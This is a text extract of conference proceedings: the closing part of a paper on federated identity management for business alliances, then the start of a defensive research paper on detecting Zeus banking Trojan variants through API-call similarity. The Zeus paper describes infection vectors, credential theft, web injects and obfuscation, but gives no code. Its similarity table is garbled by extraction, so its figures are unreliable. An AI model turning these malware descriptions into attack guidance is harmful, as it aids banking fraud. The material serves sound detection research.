terms used for enterprise collaboration (alliances) are Virtual Organizations (Skyrme 2007),<br />
Networked Organizations (Lipnack and Stamps 1994) and Collaborative Innovation Networks [GL06].<br />
The so-called Virtual Team represents another well-known expression on the micro-level (Lipnack<br />
and Stamps 1997).<br />
A common sense of the mentioned concepts can be summarized by the following aspects (Lipnack<br />
and Stamps 1997):<br />
Independent people and groups act as independent nodes in a network,<br />
Are linked across conventional boundaries (e.g. departments and geographies)<br />
And work together for a common purpose.<br />
A collaboration has multiple leaders, lots of voluntary links and interacting levels,<br />
Is based on mutual responsibility, i.e. there is no hierarchical management structure but the<br />
involved individuals act as equal partners,<br />
And teams are readjusted or disbanded as needed.<br />
A successful collaboration requires the fulfillment of the following principles (Skyrme 2007):<br />
Each partner must contribute some distinctive added value for the corporation.<br />
Members must develop high degree of mutual trust and understanding. Thus, similar groups or<br />
even the same people will work together again and again.<br />
Projects or whole services should be the focus of the cooperation.<br />
In the run-up of a collaboration one has to define general rules of engagement in terms of inputs<br />
to the cooperation and rewards expected, though the momentum is lost if these are too formalized<br />
too soon.<br />
Members of the cooperation should recognize the need for coordination roles and either commit<br />
time to develop and nurture these roles or pay one of the members to undertake the coordination<br />
roles on behalf of them.<br />
244
Maria Semmelrock-Picej et al.<br />
A clear interface needs to be developed with non virtual customers - they like tidy relationships<br />
and clear contracts. Thus either one member of the virtual cooperation must act on behalf of the<br />
others (using them as subcontractors) or create a joint company to act as their legal entity and<br />
administration service.<br />
The highly dynamic business forces Infineon to set up strategic alliances (project partnerships)<br />
frequently, in order to be competitive in cost and time. The chip design process and the production<br />
environment (silicon foundries) serve as good examples for necessary alliances. While partnerships in<br />
the course of the chip design aim at reducing the time to market, alliances during the production focus<br />
on covering customer demands which increase the available production capacities. Especially the<br />
design process for very complex chips sometimes requires setting up an alliance with one or more<br />
competitors to reduce the overall development costs of the chip. For the automotive industry (one of<br />
our three business areas), highly-logic special-function chips are designed. The business strategy of<br />
Infineon also includes cooperation in terms of an alliance with a customer to develop “next<br />
generation” chips which represent a quantum leap in technology and/or function (Schelmer 2008).<br />
Today a complex process for the setup of collaborations exist (see figure 5)<br />
The process starts with an internal employee requesting an identity entry in the IDMS for the external<br />
persons belonging to other organisations of the business alliance. The following phases include the<br />
provisioning of resources and carrying out the revocation of access on the respective resources once<br />
the alliance ends. This process is applied for each (strategic) alliance wherein external staff is<br />
involved.<br />
However, this approach requires an internal employee at Infineon to trigger a lot of things prior to an<br />
external alliance partner being able to start performing his tasks. A lot of single resources have to be<br />
provisioned for the external partners (there is currently no role-model and a suitable tooling available)<br />
accompanied by a lot of approval workflows which slows down the whole setup process. Furthermore,<br />
knowledge about external employees, e.g. which resources they need to access at Infineon, is<br />
necessary in advance (reduction in flexibility). Moreover, today the whole identity information of<br />
external persons is also kept in the IDMS whereby the data volume is blowing up.<br />
To overcome these deficiencies, the approach of Federated Identity Management (also called identity<br />
federations) whose core idea is to allow individuals to use the same accounts and passwords they<br />
have in their company to get access to a network of another company was established.<br />
At first a user’s identity data is maintained at an identitiy provider in its IDMS. In the context of SPIKE<br />
the partner company of INF takes over the role of an identity provider, while INF acts as service<br />
provider during this collaboration. Subsequently, the user tries to access a service (an application, a<br />
data source, and so on) of the service provider. Thereby, the user is verified at the identity provider<br />
(the collaboration partner) by the service provider (INF). If the identity provider successfully<br />
authenticates the data – or spoken in SPIKE terminology fulfils the tasks which were negotiated in the<br />
collaboration contract -, the user will get access to the requested service.<br />
Business partners trust each other for the user authentication mechanisms they employ in their<br />
company and also guarantee that only authenticated users will have access to services (resources,<br />
applications) of the alliance partner. This is a precondition for companies to use applications in a<br />
common way without being forced to use the same directory services, authentication mechanisms<br />
and duplicate digital identities to the other system.<br />
Federated Identity Management also reduces the administration overhead in an alliance because it is<br />
not required that the collaboration partner has to know the involved employees who need access to<br />
the resources of the alliance partner in advance. The identity provider has also a large flexibility to<br />
manage (exchange, increase, decrease) the staff during the existence of the alliance according to the<br />
needs of the service provider. The service provider only has to care for the access to applications<br />
needed by both companies (e.g. design application in the chip design area or administration<br />
applications in the IT area, and so on).<br />
In the next chapters the requirements of the component SPIKE/IF (identity federation module) of a life<br />
cycle model for collaborations will be described in order to overcome the mentioned deficiencies.<br />
245
Maria Semmelrock-Picej et al.<br />
Figure 5: Creation process for external collaboration partners<br />
3.2 Description of the requirements for connecting to external IDM<br />
Federated Identity Management enables the usage of digital identities in an inter-organisational way.<br />
This means that users can apply their local digital identity at their home company in order to access<br />
shared resources within collaborations. A fundamental precondition is the administration of digital<br />
identities in an IDMS which needs to be connected with SPIKE. For organisations willing to participate<br />
246
Maria Semmelrock-Picej et al.<br />
in collaborations operated by SPIKE we identified some technical requirements which must be fulfilled<br />
and which are presented in the next chapter:<br />
3.2.1 Overview<br />
SPIKE Identity Federation Module (short SPIKE/IF) ist the building block in the architecture (see next<br />
figure) for the setting up of collaborations between companies, defining roles and resource bundles<br />
and the access management of federated identities during collaboration.<br />
In Figure 6 the collaboration model is shown. Before a company can take part in any collaboration,<br />
the phase “collaboration setup” has to be passed. This phase describes the tasks of a company’s<br />
administrator, to provide the required resources. The most basic resource to be provided is the<br />
network configuration.<br />
Figure 6: Identity federation life cycle model<br />
3.2.2 Setting up a collaboration<br />
In our project there are different types of collaboration possible, depending on who is carrying out the<br />
service provider function in the collaboration.<br />
It is that users of a company can only be assigned to services of a partner company by the<br />
responsibles of their own company (security, reducing complexity and keep flexibility). Only the hub<br />
company can extend a collaboration with additional partner companies (security aspect). In the<br />
following the setting up of a collaboration is visualized.<br />
Unfortunately, nowadays collaborative applications commonly use centralized infrastructures. The use<br />
of such systems has generated a huge interest in decentralized systems so that in our case different<br />
types of collaboration are possible depending on who is carring out the service provider funtion in the<br />
collaboration. In the following the centralized collaboration is presented (figure 8):<br />
247
Figure 7: Steps to set up a collaboration<br />
Figure 8: Centralized collaboration<br />
Maria Semmelrock-Picej et al.<br />
248
Maria Semmelrock-Picej et al.<br />
In the case of a centralized collaboration only the hub company offers services which are accessed by<br />
partners. The partner companies only act as identity provider for their federated users. This type of<br />
collaboration mostly apperas when only one large company is involved which offers a large service<br />
and application landscape with complex business processes supported by workflow management<br />
systems and when partners are mostly smaller companies without an own service infrastructure but<br />
specialized and/or cost-efficient employees which take over whole outsourced services of the Hub<br />
company.<br />
In the case of a decentralized collaboration (see figure 9) all partners offer services in the<br />
collaboration and act as Service Providers which are accessed mutually. All Partner act as identity<br />
Provider for their federated users. This type of collaboration often appears when one or more large<br />
companies are involved which offer a large service and application landscape with complex business<br />
processes supported by workflow management systems and those workflows include the involvement<br />
of highly specialized partner companies or when partners are companies with few but highly<br />
specialized services which can be offered cost-efficiently.<br />
Figure 9: Decentralized collaboration<br />
3.2.3 Role and resource management<br />
Modeling roles is a research topic with a long history. There are a lot of approaches (Ferraiolo, Kuhn<br />
and Chandramouli 2003) which are more or less successful. They can be classified according to three<br />
different strategies:<br />
Top-down is based on the analysis of business processes and organizational structures;<br />
Bottom-up tries to analyze information of existing permissions throughout different systems and<br />
aggregate similar patterns (clusters) to roles;<br />
Hybrid approaches combine both strategies<br />
The necessary steps during resource and role management are modelled in figure 10.<br />
249
Maria Semmelrock-Picej et al.<br />
Figure 10: Steps during role and resource management<br />
4. Conclusions<br />
In this paper the architecture of SPIKE IDMS is presented and it is shown how it can be integrated<br />
with an IdP. The SPIKE IDMS has been thought to work mainly for SMEs which do not own a<br />
propietary IDMS and therefore need this extra tool when a collaboration within SPIKE is started. In<br />
doing so we improve the opportunities of SMEs in a globalising world.<br />
References<br />
Artz, D. and Gil, Y. (2007) „A survey of trust in computer science and the semantic web“, Journal of Web<br />
Semantics, Vol 5, No. 2, pp 58-71.<br />
Billhardt, H., Hermoso, R., Ossowski, S. and Centeno, R. (2007) „Trust-based service provider selection in open<br />
environments“, ACM Symposium on Applied Computing (SAC), pp 1375-1380.<br />
Davenport, T.H. and Prusak, L. (1998) Working Knowledge: How Organizations Manage What they know,<br />
Harvard Business School Press, Boston MA.<br />
Ferraiolo, D.F., Kuhn, R.D. and Chandramouli, R. (2003) Role-Based Access Control, Artech House.<br />
Economist (2008) “The role of trust in business collaboration. An Economist Intelligence Unit”, Cisco Systems,<br />
Vol 10, No. 70.<br />
250
Maria Semmelrock-Picej et al.<br />
Fuchs, L. and Pernul, G. (2007) “Supporting Compliant and Secure User Handling – A Structured Approach for<br />
In-House Identity Management”, The Second International <strong>Conference</strong> on Availability, Reliability and<br />
Security (ARES 2007), IEEE Society, Los Alamitos, pp 374–384.<br />
Jackson, G. (2010) “Identity and Access Management”, [online], The University of Chicago, Overview paper,<br />
www.internet2.edu/pubs/200703-ISMW.pdf.<br />
Josang, A., Ismail, R. and Boyd, D. (2007) “A survey of trust and reputation systems for online service provision”,<br />
Decision Support Systems, Vol 43, No. 2, pp 618-644.<br />
Klein, R., Rai, A. and Straub, D.W. (2007) “Competitive and cooperative positioning in supply chain logistics<br />
relationship”, Decision Sciences, Vol 38, No. 4, pp 611-646.<br />
Lipnack, J. and Stamps, J. (1994) The age of the Network – Organizing principles for the 21 st Century, John<br />
Wiley & Sons.<br />
Lipnack, J. and Stamps, J. (1997) Virtual Teams – Reaching across space, time and organizations with<br />
technology, John Wiley & Sons.<br />
Matsuo, Y. and Yamamoto, H. (2009) “Community gravity: Measuring bidirectional effects by trust and rating on<br />
online social network”, International World Wide Web <strong>Conference</strong> (WWW), pp 751-760.<br />
Mohrman, S. A., Finegold, D. and Mohrman, A. M. (2003) “An empirical model of the organization knowledge<br />
system in new product development firms”, Journal of Engineering Technology Management, Vol 20, No. 1,<br />
pp 7-38.<br />
Mori, J., Sugiyaman, T. and Matsuo, Y. (2005) “Real-world oriented information sharing using social networks”,<br />
Group, pp 81-85.<br />
Mui, L., Mohtashemi, M. and Halberstadt, A. (2002) “A computational model of trust and reputation for e-<br />
Business”, Hawaii International <strong>Conference</strong>s on Systems Sciences (HICSS), p.188.<br />
Obiltschnig, A. (2007) Role-based Provisioning - Ein praktischer Ansatz im Identity Manage-ment, Institute for<br />
Applied Computer Science, Faculty for Technical Sciences, University of Klagenfurt, Klagenfurt.<br />
Schmelmer M. (2008) “Infineon setzt bei IT auf Einsparungen”, [online],<br />
www.cio.de/strategien/methoden/850789/index.html.<br />
Semmelrock-Picej, M.Th. and Possegger, A. (2010) “Ausgewählte Sicherheitsrelevante Aspekte der<br />
eCollaboration”, D-A-CH Security 2010, pp 314-325.<br />
Skyrme, D. (2007) „Insights“, [online], www.skyrme.com/insights/.<br />
Zack, M.M. (1999) “Managing codified knowledge”, Sloan Management Review, Vol 40, No. 4, pp 45-58.<br />
Ziener, K. (2010) Grenzüberschreitende Wirtschaftskooperationen und Interreg III A Projekte, Klagenfurt 2010.<br />
251
Anatomy of Banking Trojans – Zeus Crimeware (how<br />
Similar are its Variants)<br />
Madhu Shankarapani and Srinivas Mukkamala<br />
(ICASA)/(CAaNES)/New Mexico Institute of Mining and Technology, USA<br />
madhuk@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: To add complexity to existing cyber threats; targeted Crimeware that steals personal information for<br />
financial gains is for sale as low as $700 dollars. Baking Trojans have been notoriously difficult to kill and to date<br />
most antivirus and security technologies fail to detect or prevent them from causing havoc. Zeus which is<br />
considered as one of the most nefarious financial and banking Trojans targets business and financial institutions<br />
to perform unauthorized automated clearinghouse (ACH) and wire transfer transactions for check and payment<br />
processing. Zeus is causing billions of dollars in losses and is facilitating identity theft of innocent users for<br />
financial gains. Zeus Crimeware does one thing very well that every security researcher envy’s – obfuscation.<br />
Zeus kit conceals the exploit code every time a binary is created. Zeus Crimeware has an inbuilt binary generator<br />
that generates a new binary file on every use that is radically different from others; which evades detection from<br />
antivirus or security technologies that rely on signature based detection. The effectiveness of an up to date<br />
antivirus against Zeus is thus not 100%, not 90%, not even 50% – it’s just 23% which is alarming. No<br />
matter how smart and how different Zeus binaries are, most of them share a few common behavioral patterns<br />
such as an ability to take screenshots of a victim's machine, or control it remotely, hijacking E-banking sessions<br />
and logging them to the level of impersonation or add additional pages to a website and monitor them, or steal<br />
passwords that have been stored by popular programs and use them. In this paper we present detection<br />
algorithms that can help the antivirus community to ensure a variant of a known malware can still be detected<br />
without the need of creating a signature; a similarity analysis (based on specific quantitative measures) is<br />
performed to produce a matrix of similarity scores that can be utilized to determine the likelihood that a piece of<br />
code or binary under inspection contains a particular malware. The hypothesis is that all versions of the same<br />
malware family or similar malware family share a common core signature that is a combination of several<br />
features of the code (binary). Results from our recent experiments on 40 different variants of Zeus show very<br />
high similarity scores (over 85%). Interestingly Zeus variants have high similarity scores with other banking<br />
Trojans (Torpig, Bugat, and Clampi) and a well know data stealing Trojan Qakbot. We present experimental<br />
results that indicate that our proposed techniques can provide a better detection performance against banking<br />
Trojans like Zeus Crimeware.<br />
Keywords: Zeus Crimeware, banking Trojans, Torpig, Bugat, Clampi, malware similarity analysis, anatomy of<br />
Zeus, malware analytics<br />
1. Introduction<br />
One of the major concerns in network security is controlling the spread of malware over the Internet.<br />
In particular, polymorphic and metamorphic versions of the malware are the most troublesome among<br />
malware families, because of their capabilities not only to infect the systems but also have potential to<br />
steal confidential user data and be persistent. These kinds of malware are written with the intent of<br />
taking control of large number of hosts on the internet. Once the hosts are infected by Trojans, they<br />
may join a botnet for stealing personal data such as user credentials (Holz, Engelberth and Freiling,<br />
2008), (Kanich et al, 2008). Over a period of time writing malware has changed from developed for<br />
fun, to the present, where it is written for financial gains.<br />
Trojans in the past were used for sending spam emails, installing third party malware, keystroke<br />
logging, crashing the host machine, uploading or downloading of files on the infected machines. In the<br />
present generation Trojans are far more complex, when Trojan notices the user visiting the websites<br />
of targeted bank it springs into action. When the user is carrying out some transactions, the Trojan<br />
looks at the available balance and calculates how much money to steal. These Trojans are given<br />
upper and lower bound limits that are below the amount that triggers antifraud systems. ZEUS,<br />
Torpig, zlob, vundo, smitfraud, etc are a few examples for deadly Trojans that caused major financial<br />
loss.<br />
Torpig is a malware program that was developed to steal sensitive information from its infected hosts.<br />
In early 2005 over 180 thousand machines were infected and about 70 GB of data were stolen and<br />
uploaded to the bot-masters (Stone-Gross et al, 2009), (Nichols, 2009). Torpig depends on domain<br />
flux for its main C&C servers, and also the servers to perform drive-by-download to spread on a<br />
252
Madhu Shankarapani and Srinivas Mukkamala<br />
network. Using JavaScript, it generates pseudo-random domain name on-the-fly and redirects victims<br />
to a malicious webpage.<br />
Vundo, also known as VirtuMundo, VirtuMonde, and MS Juan, spreads via email, peer-to-peer file<br />
sharing, and by other malware (Bell and Chien, 2010). It exploits browser vulnerability and displays<br />
pop-up advertisements. This Trojan has capabilities to inject advertisements into search results.<br />
Fraudulent or misleading applications, intrusive pop-ups, fake scan results are characteristics of this<br />
Trojan. Vundo lowers security settings, prevents access to certain websites, and also disables<br />
antivirus programs, to make it further difficult to remove them. Its new variants are far more<br />
sophisticated with their payloads and its functionality. They have the capability to exploit vulnerability<br />
to download misleading software, and extensions that encrypt files in order to force user for money.<br />
Zeus is a Trojan horse that steals banking information from infected machines, which spreads using<br />
drive-by-downloads and phishing emails. Since from the date it was first identified, Zeus has been<br />
very active in the wild with constant increase in threat. The most threatening is a large group working<br />
on Zeus to create enormous Zeus/Zbot variants builder, which can evade the present anti-virus<br />
software.<br />
The problem is so critical, that a significant research effort has been invested to gain a better<br />
understanding of these malware characteristics. One of the approaches to study the characteristics is<br />
to perform passive analysis of secondary effects that are caused by the activities of compromised<br />
hosts. Many researchers have performed passive analysis like collecting spam emails that are likely<br />
to be sent by bots (Zhuang et al, 2008), DNS queries (Rajab et al, 2007), (Rajab et al, 2006) or DNS<br />
blacklist queries (Ramachandran, Feamster and Dagon, 2006) performed by the bot-infected<br />
machines, analysis of network traffic for cues that are characteristics for certain botnets (Karasaridis,<br />
Rexroad and Hoeflin, 2007).<br />
While these analysis provides interesting insights into particular characteristics of Trojans and bots, its<br />
approach is limited to those botnets that actually exhibit the activity targeted by the analysis. Active<br />
approaches to analyze botnets are through permeation. In this approach researchers join the bot to<br />
perform analysis. Usually honeypots or spam traps are used to collect a copy of a malware sample.<br />
Later, the obtained samples are executed in controlled environment and observe its behavior.<br />
Observations include traffic that is exchanged between bots and its command and control server(s),<br />
IP addresses of other clients that are concurrently logged into the IRC channel (Rajab et al, 2006),<br />
(Cooke, Jahanian and McPherson, 2006), (Freiling, Holz and Wicherski, 2005). Unfortunately these<br />
techniques do not work on stripped-down IRC or HTTP servers as their C&C channels.<br />
Present anti-virus techniques are based on either signature-based detection which is not effective<br />
against polymorphic and unknown malware, or heuristic-based algorithms which are inefficient and<br />
inaccurate. Detection based on string signatures uses a database of regular expressions and a string<br />
matching engine to scan files and detect infected ones. Each regular expression of the database is<br />
designed to identify a known malicious program. Though traditional signature-based malware<br />
detection methods does exists from ages, there are lots to improve the signature-based detection and<br />
to detect new malware a few data mining and machine learning techniques are proposed (Westfeld,<br />
2001: 289-302), (Sallee, 2005: 167-189), (Solanki, Sarkar and Manjunath, 2007: 16-31) examined the<br />
performance of various classifiers such as Naïve Bayes, support vector machine (SVM) and plotting<br />
ROC curves using decision tree methods. (Lyu, and Farid, 2002: 340-354) applied Objective-Oriented<br />
Association (OOA) mining based classification (Fridrich, 2004: 67-81), (Shi, Chen and Chen, 2006) on<br />
Windows API execution sequences called by PE files. A Few of these methods entirely rely on the<br />
occurrence of API sequence of execution. There are methods where websites are crawled to inspect<br />
if those websites host any kind of malicious executables (Pevny, Fridrich, 2007). This study is<br />
generally for web server security, advertising and third-party widgets. Their basic idea of approach<br />
shows how malware executables are often distributed across a large number of URLs and domains.<br />
Analyze and detect these obfuscated malicious executable is by itself a vast field.<br />
Our work is based on collection of Zeus/Zbot variants collected at Offensive Computing (Offensive<br />
Computing, 2010). As of today, Offensive Computing has one of the largest malware databases which<br />
include various kinds of executables like spyware, adware, virus, worms, Trojans, etc. Among<br />
thousands of malware in computing world, the unique executables is likely to be much lower as many<br />
253
Madhu Shankarapani and Srinivas Mukkamala<br />
binaries differ only in binary packing (Chen and Shi, 2008) and not in their functionality. In this paper<br />
we show how Zeus/Zbot variants can be detected effectively.<br />
In our recent engagements we used this methodology to detect variants of Conficker, Zeus<br />
Crimeware, and Data stealers that bypassed several popular antivirus tools, host based security tools,<br />
and perimeter security devices.<br />
In this paper, we present API call sequence approach to detect Zeus samples. Our approach rests on<br />
the analysis of Windows API call sequence, and applying distance measures to detect how similar are<br />
these variants.<br />
In summary, the main contribution of this paper is to detect Zeus effectively. In this paper, we talk<br />
about a few lethal malware and how important is it to find a good defensive mechanism, in<br />
introduction. Next is about the evolution of Zeus, followed by its reverse engineered result. And the<br />
following section we explain our method of analyzing Zeus. Finally, we conclude with our conclusion<br />
based on our experiments and references.<br />
2. Evolution of Zeus/Zbot<br />
Zeus is a Trojan horse that steals banking information from infected machines, which spreads using<br />
drive-by-downloads and phishing emails. Its persistence is because of large number of attackers<br />
using Zeus builder. These attackers pay thousands of dollars for the latest Zeus builders which are<br />
up-to-date undetectable bot builds (SHEVCHENKO, 2009). Everyday a new Zeus/Zbot samples are<br />
distributed by modifying the bot that are being produced in the wild, or by using packers and<br />
encrypted on top with all sorts of packers, and few using custom built packers. Before its release,<br />
these samples are uploaded to multi-anti-virus scanners to make sure they are not detected by any<br />
anti-virus vendor.<br />
The worse thing of Zeus/Zbot is in latest generation of bot which uses rootkit techniques to hide its<br />
presence on infected machine, and injects additional fields into online Internet banking websites.<br />
These details are collected and sent to remote systems, which is later stored in remote database.<br />
From this database the attacker uses user credentials to transfers desired amount to his account.<br />
In July 2007, Zeus was first found infecting United States Department of Transportation and stole data<br />
from over 1000 PCs (Wikipedia, 2010), (Ragan, 2009). As of October 2009, 1.5 million phishing<br />
messages were sent through Facebook. In November 2009, A malicious spam emails were spreading<br />
Zeus purporting to be from Verizon Wireless (Moscaritolo, 2009). On October 1, 2010 a major cyber<br />
crime network had hacked into US computers using Zeus and stole around $70 million (Wikipedia,<br />
2010). Since its discovery to this day gangs have netted more than $200 million (McMillan and Kirk,<br />
2010).<br />
3. Reverse engineering Zeus/Zbot<br />
Zeus has been in the wild since 2006, though its method of propagation is through spam campaigns<br />
and drive-by downloads, due to its versatile nature even other vectors may also be utilized. The user<br />
may receive masquerading email message as if it is from well known organizations such as FDIC,<br />
IRS, Facebook or Microsoft. The message body warns the user about a financial problem and<br />
suggests visiting the link provided in the message body. Once the user visits the link, Trojan gets<br />
downloaded and compromises the host machine.<br />
Based on behavior of an executable (Qureshi) Zeus can be classified as Trojans. Zeus propagates<br />
using drive-by-downloads and phishing emails. It uses compromised FTP servers and peer-to-peer<br />
networks to spread, and unlike worm the end-user have to initiate the download. Once Zeus is<br />
downloaded on to a computer, it gets installed by itself, and tries to connect to the bots command<br />
controls for further instructions. From the command control it downloads configuration files and infects<br />
the browser. Later the malware monitors browser activities and steals appropriate data based on the<br />
encrypted information in the configuration file. Since it hooks up with services like svchosts to act as<br />
man in the browser, this shows characteristics of a virus.<br />
Figure (1) shows that the Trojan is packed using UPX, one of the most widely used packers and<br />
Figure (2) is its opcode instructions with initial EntryPoint. Figure (3) shows that the Trojan is packed<br />
and encrypted with the custom made Zeus builder and Figure (4) is its opcode instructions.<br />
254
Figure 1: UPX packed Trojan<br />
Figure 2: Opcode instructions with entry points<br />
Madhu Shankarapani and Srinivas Mukkamala<br />
Figure 3: Trojan packed and encrypted with the custom made Zeus builder<br />
255
Madhu Shankarapani and Srinivas Mukkamala<br />
Figure 4: Opcode instructions with entry points for the Trojan with custom made Zeus builder<br />
According to our observations though these two Trojans were created using different packers, their<br />
characteristics of using Windows API are almost similar. We observed the API call sequence of both<br />
the Trojans. When we applied distance measures after its API sequence alignment between them, we<br />
found they are about 92.32% similar to each other. This shows that irrespective of the obfuscation<br />
method used to create Zeus variants; our methodology can detect these Trojans.<br />
4. Analysis methodology<br />
First, the Zeus sample is decompressed and passed through a PE file parser, producing the<br />
intermediate representation which consists of a Windows API calling sequence. This sequence is<br />
compared to a known malware sequence or signature (from the signature database) and is passed<br />
through the similarity measure module to generate the similarity report. The detection decision is<br />
made based on this similarity report. The PE binary parser transforms the PE binary file into an API<br />
calling sequence. It uses two components, W32Dasm version 8.9 and a text parser for disassembled<br />
code. W32Dasm by URSoftware Co. is a commercial disassembler, which disassembled the PE code<br />
and outputs assembly instructions, imported modules, imported API’s, and recourse information. The<br />
text parser parses the output from W32Dasm to a static API calling sequence, which becomes our<br />
signature.<br />
Table 1: Similarity analysis of Zeus/Zbot compared among different variants<br />
Tro<br />
jan.<br />
Troj<br />
Sp<br />
Troj an. Troj Troj<br />
Troj<br />
y.Z<br />
Troj an. Spy an.S an.S<br />
Troj<br />
an.<br />
eus Troj Troja an.B Zbo .Ze py.Z py.Z Troja Troja an.Z Spy.<br />
.1. an.Z n.Spy roke t- us. eus. eus. n.Zbo n.Spy bot- DHL Zeu<br />
Ge bot- .Zeus r- 134 1.G 1.Ge 1.Ge t- .Zeus 115 _DO s.1.<br />
n. 85. .2.Ge 12. 2.m en. n.m n.m 290. .1.Ge 1.m C.m Gen<br />
mal mal n.mal mal al mal al al mal n.mal al al .mal<br />
Trojan.Sp 10<br />
y.Zeus.1. 0.0 51.9<br />
92.3 70. 51. 71.2 60.9<br />
79.8 71.2 47.7<br />
Gen.mal 0 0 67.00 2 06 72 7 3 63.45 61.43 8 7 1<br />
Trojan.Zb 46. 100.<br />
51.2 58. 53. 70.3 52.4<br />
63.5 69.5 45.3<br />
ot-85.mal<br />
Trojan.Sp<br />
83 00 58.19 7 00 44 9 6 56.69 42.69 3 0 3<br />
y.Zeus.2. 41. 49.7 100.0 66.0 70. 66. 30.9 51.9<br />
58.4 61.0 53.9<br />
Gen.mal<br />
Trojan.Bro<br />
31 2 0 3 78 95 9 1 88.23 60.26 9 7 0<br />
ker- 49. 34.7<br />
100. 43. 52. 38.2 44.1<br />
64.6 44.0 38.8<br />
12.mal 59 3 47.55 00 98 98 7 7 47.82 45.79 6 3 1<br />
256
Trojan.Zb<br />
ot-<br />
1342.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Zb<br />
ot-<br />
290.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Zb<br />
ot-<br />
1151.mal<br />
DHL_DO<br />
C.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
MemScan<br />
Trojan.Sp<br />
y.Zeus.C.<br />
mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Zb<br />
ot-<br />
1652.mal<br />
GenTroja<br />
n.Heur.Zb<br />
ot<br />
Zeus.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
ZeuS_bin<br />
ary.mal<br />
ZeuS_bin<br />
ary.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Trojan.Zb<br />
ot-<br />
2819.mal<br />
Trojan.Sp<br />
y.Zeus.1.<br />
Gen.mal<br />
Tro<br />
jan.<br />
Sp<br />
y.Z<br />
eus<br />
.1.<br />
Ge<br />
n.<br />
mal<br />
58.<br />
89<br />
65.<br />
58<br />
54.<br />
23<br />
57.<br />
96<br />
29.<br />
14<br />
64.<br />
30<br />
65.<br />
65<br />
40.<br />
35<br />
52.<br />
77<br />
78.<br />
75<br />
75.<br />
87<br />
69.<br />
79<br />
71.<br />
28<br />
64.<br />
18<br />
51.<br />
25<br />
76.<br />
05<br />
70.<br />
61<br />
44.<br />
52<br />
52.<br />
94<br />
52.<br />
74<br />
Troj<br />
an.Z<br />
bot-<br />
85.<br />
mal<br />
Madhu Shankarapani and Srinivas Mukkamala<br />
Troja<br />
n.Spy<br />
.Zeus<br />
.2.Ge<br />
n.mal<br />
63.7<br />
9 72.30<br />
68.4<br />
6 68.26<br />
56.9<br />
4 65.71<br />
49.4<br />
8 88.34<br />
44.2<br />
3 47.07<br />
69.3<br />
7 76.24<br />
59.4<br />
3 71.08<br />
40.5<br />
1 51.52<br />
52.9<br />
6 58.50<br />
78.2<br />
5 61.34<br />
75.2<br />
3 86.08<br />
69.3<br />
9 71.49<br />
76.3<br />
2 77.17<br />
53.6<br />
7 62.34<br />
59.0<br />
7 68.87<br />
87.6<br />
1 72.13<br />
77.7<br />
5 76.10<br />
43.0<br />
8 61.80<br />
57.5<br />
7 58.88<br />
68.8<br />
1 49.63<br />
Troj<br />
an.B<br />
roke<br />
r-<br />
12.<br />
mal<br />
83.4<br />
4<br />
84.6<br />
2<br />
76.9<br />
2<br />
83.9<br />
8<br />
41.5<br />
5<br />
87.5<br />
5<br />
83.6<br />
5<br />
62.8<br />
6<br />
66.4<br />
3<br />
76.6<br />
3<br />
77.0<br />
7<br />
71.6<br />
0<br />
64.0<br />
2<br />
75.5<br />
4<br />
79.9<br />
1<br />
70.2<br />
4<br />
68.3<br />
8<br />
64.4<br />
1<br />
68.6<br />
3<br />
51.0<br />
9<br />
Troj<br />
an.<br />
Zbo<br />
t-<br />
134<br />
2.m<br />
al<br />
100<br />
.00<br />
58.<br />
25<br />
74.<br />
23<br />
76.<br />
37<br />
34.<br />
21<br />
70.<br />
67<br />
75.<br />
80<br />
43.<br />
59<br />
79.<br />
69<br />
75.<br />
13<br />
74.<br />
35<br />
78.<br />
77<br />
76.<br />
97<br />
81.<br />
87<br />
69.<br />
26<br />
73.<br />
69<br />
69.<br />
21<br />
39.<br />
01<br />
64.<br />
06<br />
64.<br />
13<br />
Troj<br />
an.<br />
Spy<br />
.Ze<br />
us.<br />
1.G<br />
en.<br />
mal<br />
77.<br />
09<br />
100<br />
.00<br />
59.<br />
96<br />
59.<br />
37<br />
38.<br />
33<br />
70.<br />
03<br />
75.<br />
86<br />
52.<br />
05<br />
60.<br />
01<br />
79.<br />
93<br />
66.<br />
52<br />
73.<br />
46<br />
67.<br />
71<br />
65.<br />
30<br />
58.<br />
36<br />
79.<br />
45<br />
73.<br />
13<br />
46.<br />
47<br />
63.<br />
33<br />
64.<br />
95<br />
257<br />
Troj<br />
an.S<br />
py.Z<br />
eus.<br />
1.Ge<br />
n.m<br />
al<br />
55.0<br />
1<br />
70.9<br />
0<br />
100.<br />
00<br />
67.5<br />
2<br />
30.2<br />
3<br />
64.6<br />
9<br />
61.8<br />
1<br />
40.0<br />
0<br />
64.7<br />
5<br />
71.8<br />
8<br />
71.0<br />
9<br />
74.1<br />
7<br />
77.2<br />
0<br />
72.5<br />
4<br />
53.3<br />
1<br />
67.9<br />
8<br />
70.0<br />
6<br />
41.9<br />
1<br />
67.5<br />
3<br />
71.1<br />
3<br />
Troj<br />
an.S<br />
py.Z<br />
eus.<br />
1.Ge<br />
n.m<br />
al<br />
Troja<br />
n.Zbo<br />
t-<br />
290.<br />
mal<br />
Troja<br />
n.Spy<br />
.Zeus<br />
.1.Ge<br />
n.mal<br />
76.7<br />
1 80.02 58.13<br />
81.7<br />
1 54.58 42.36<br />
66.6<br />
9 96.12 54.59<br />
100.<br />
00 51.16 54.44<br />
53.7<br />
3<br />
74.6<br />
3 61.09<br />
100.0<br />
0 21.68<br />
100.0<br />
0<br />
63.1<br />
1<br />
62.5<br />
61.11 57.36<br />
6 66.98 41.70<br />
78.7<br />
2 76.44 60.37<br />
84.0<br />
5 85.10 80.75<br />
72.3<br />
5 53.98 63.05<br />
85.2<br />
8 92.50 70.64<br />
70.9<br />
9<br />
69.1<br />
79.78 75.07<br />
2 75.56 69.18<br />
78.0<br />
0<br />
67.8<br />
64.52 65.70<br />
4<br />
75.0<br />
67.21 70.49<br />
0 51.33 61.99<br />
47.0<br />
